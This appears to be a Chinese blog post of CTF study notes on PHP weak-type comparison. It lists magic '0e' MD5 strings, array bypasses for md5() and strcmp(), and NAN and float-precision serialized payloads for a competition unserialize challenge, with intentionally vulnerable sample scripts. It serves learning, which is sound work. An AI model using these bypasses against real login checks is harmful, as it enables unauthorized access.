• php弱类型相关


    php的弱类型

    php是个弱类型的语言.

    = 赋值
    == 只比较值(比较的时候会发生类型转换)
    === 全等于,值和类型
    !== 比较值和类型
    != 只比较值
    数值和字符串比较,那么字符串会转换为数值
    

    常见的 ==

    '' == 0 
    0 == false
    NULL == 0
        intval('')->int(0)
        intval('false')->int(0)
    123 == '123'
    0 == 'aa'
    1 == '1aaa'
        intval('1aaa')->int(1)
    '0e123456' == '0e484848'(科学计数法)
    true == 1
    

    md5弱比较的绕过

    $a1 != $a2;
    md5($a1) = md5($a2);
    (绕过碰撞,找两个md5值为0e开头的)
    
    可以使MD5函数报错,传数组
        数组绕过
    

    常见的md5为0e开头的

    0e开头的md5和原值:
    QNKCDZO
    0e830400451993494058024219903391
    240610708
    0e462097431906509019562988736854
    s878926199a
    0e545993274517709034328855841020
    s155964671a
    0e342768416822451524974117254469
    s214587387a
    0e848240448830537924465865611904
    s214587387a
    0e848240448830537924465865611904
    s878926199a
    0e545993274517709034328855841020
    s1091221200a
    0e940624217856561557816327384675
    s1885207154a
    0e509367213418206700842008763514
    s1502113478a
    0e861580163291561247404381396064
    s1885207154a
    0e509367213418206700842008763514
    s1836677006a
    0e481036490867661113260034900752
    s155964671a
    0e342768416822451524974117254469
    s1184209335a
    0e072485820392773389523109082030
    s1665632922a
    0e731198061491163073197128363787
    s1502113478a
    0e861580163291561247404381396064
    s1836677006a
    0e481036490867661113260034900752
    s1091221200a
    0e940624217856561557816327384675
    s155964671a
    0e342768416822451524974117254469
    s1502113478a
    0e861580163291561247404381396064
    s155964671a
    0e342768416822451524974117254469
    s1665632922a
    0e731198061491163073197128363787
    s155964671a
    0e342768416822451524974117254469
    s1091221200a
    0e940624217856561557816327384675
    s1836677006a
    0e481036490867661113260034900752
    s1885207154a
    0e509367213418206700842008763514
    s532378020a
    0e220463095855511507588041205815
    s878926199a
    0e545993274517709034328855841020
    s1091221200a
    0e940624217856561557816327384675
    s214587387a
    0e848240448830537924465865611904
    s1502113478a
    0e861580163291561247404381396064
    s1091221200a
    0e940624217856561557816327384675
    s1665632922a
    0e731198061491163073197128363787
    s1885207154a
    0e509367213418206700842008763514
    s1836677006a
    0e481036490867661113260034900752
    s1665632922a
    0e731198061491163073197128363787
    s878926199a
    0e545993274517709034328855841020
    

    MD5相关

    <?php 
    	ini_set("display_error",false);
    	error_reporting(0);
    	if ($_POST['a']!=$_POST['b']&&md5($_POST['a'])==md5($_POST['b'])) 
    	{
    		die("success");
    	}
    	else
    	{
    		echo "fail";
    	}
    ?>
    

    md5(xx)=0exxxx

    QNKCDZO md5 : 0e830400451993494058024219903391
    240610708 md5 : 0e462097431906509019562988736854

    数组绕过

    对于$a[]=1;,它的意义应该是在先将$a转换为数组类型,再在后面添加变量

    但是Warning: Cannot use a scalar value as an array in php shell code on line 1

    $b初始化值之后,不可以再进行$b[]=1;的操作

    可以通过$x=array();的操作使$a强制转换为数组;

    对于md5(),md5(string,raw),第一个参数必须为字符串类型;

    如果传进去数组,则会返回NULL

    所以,对于两个数组,md5($a[])===md5($b[])

    2020 国赛trick

    <?php
    class trick{
        public $a;
        public $b;
        public function __destruct(){
            $this->a = (string)$this->a;
            if(strlen($this->a) > 5 || strlen($this->b) > 5){
                die("你太长了");//a,b的值不能超过5
            }
            if($this->a !== $this->b && md5($this->a) === md5($this->b) && $this->a != $this->b){
                echo file_get_contents("/flag");
            }
        }
    }
    highlight_file(__FILE__);
    unserialize($_GET['trick']); 
    

    利用NaN绕过

    某些数学运算会产生一个由常量NaN所代表的结果.此结果代表着一个在浮点数运算中未定义或不可表述的值.因此它与任何值进行松散或严格的比较的结果都是FALSE.(别的还有类似的INF)

    由于NaN代表着任何不同的

    值,不应该拿NAN去和其它值进行比较.

    可以通过is_nan()函数来判断

    <?php
    class trick{
        public $a;
        public $b;
    }
    
    $tr = new trick();
    $tr->a = NAN;
    $tr->b = NAN;
    echo serialize($tr);
    ?>
    

    PHP精度的绕过

    php只能精度到0.10000000000000精度不衰减。但是后面加加上1以后0.100000000000001直接等于0.1

    <?php
    $a=0.1;
    $b=0.100000000000001;
    var_dump($a!==$b);#bool(true)
    var_dump($a!=$b);#bool(true)
    var_dump(md5($a)===md5($b));#bool(true)
    var_dump($a!==$b&& $a!=$b&&md5($a)===md5($b));#bool(true)
    ?>
    

    payload:

    <?php
    class trick{
        public $a=0.1;
        public $b=0.100000000000001;
    }
    $payload=new trick();
    echo serialize($payload);
    ?>
    #O:5:"trick":2:{s:1:"a";d:0.1;s:1:"b";d:0.100000000000001;}
    
    

    json相关

    <?php 
    	highlight_file(__FILE__);
    	include 'flag.php';	
    	if (isset($_POST['message']))
    	{
    		$message = json_decode($_POST['message']);
    		if ($message->key == $key) 
    		{
    			echo $flag;
    		}
    		else
    		{
    			echo "fail";
    		}
    	}
    	else
    	{
    		echo "~~~~";
    	}
    ?>
    
    

    flag.php:

    <?php 
    	$key = "6xxxxx";
    	$flag = 'flag{aaaaa0}';
    
    ?>
    
    

    payload: message={"key":6}

    利用 数字与字符串比较的特性

    也可以抓包爆破

    switch

    <?php 
    	highlight_file(__FILE__);
    	$i = "3name";
    	switch ($i) 
    	{
    		case 0:
    		case 1:
    		case 2:
    			echo "fail";
    		case 3:
    			echo "flag";
    	}
    ?>
    
    

    strcmp相关

    官方手册 : https://www.php.net/manual/zh/function.strcmp.php

    <?php 
    	
    	highlight_file(__FILE__);
    	include "flag.php";
    	if(isset($_POST['password']))
    	{
    		if (strcmp($_POST['password'],$password) == 0) 
    		{
    			echo $flag;
    			exit();
    		}
    		else
    		{
    			echo "wrong password";
    		}
    	}
    
    ?>
    
    

    数组绕过

    原因是

    strcmp("foo", array()) => NULL + PHP Warning
    strcmp("foo", new stdClass) => NULL + PHP Warning
    strcmp(function(){}, "") => NULL + PHP Warning
    
    

    in_array()

    还有array_search(),strpos()等函数,比较中也存在弱类型

    可以参考 https://www.cnblogs.com/anbus/p/10000571.html

  • 相关阅读:
    unity中制作模拟第一人称视角下的指南针
    unity3D 中的C#脚本一个类调用另一类中简单方法
    unity中UI的屏幕自适应代码
    unity中导入插件时报错处理办法
    Unity3D在C#编程中的一些命名空间的引用及说明
    Unity中物体碰撞后去掉相互之间的反弹力
    unity3D打包发布Apk详细步骤
    unity3D开发的程序发布到Android平台上进行运行测试的详细步骤
    JAVA的环境变量配置(方式二)
    Java中的 JDK下载和环境配置(方式一)
  • 原文地址:https://www.cnblogs.com/l0nmar/p/13626600.html
Copyright © 2020-2023  润新知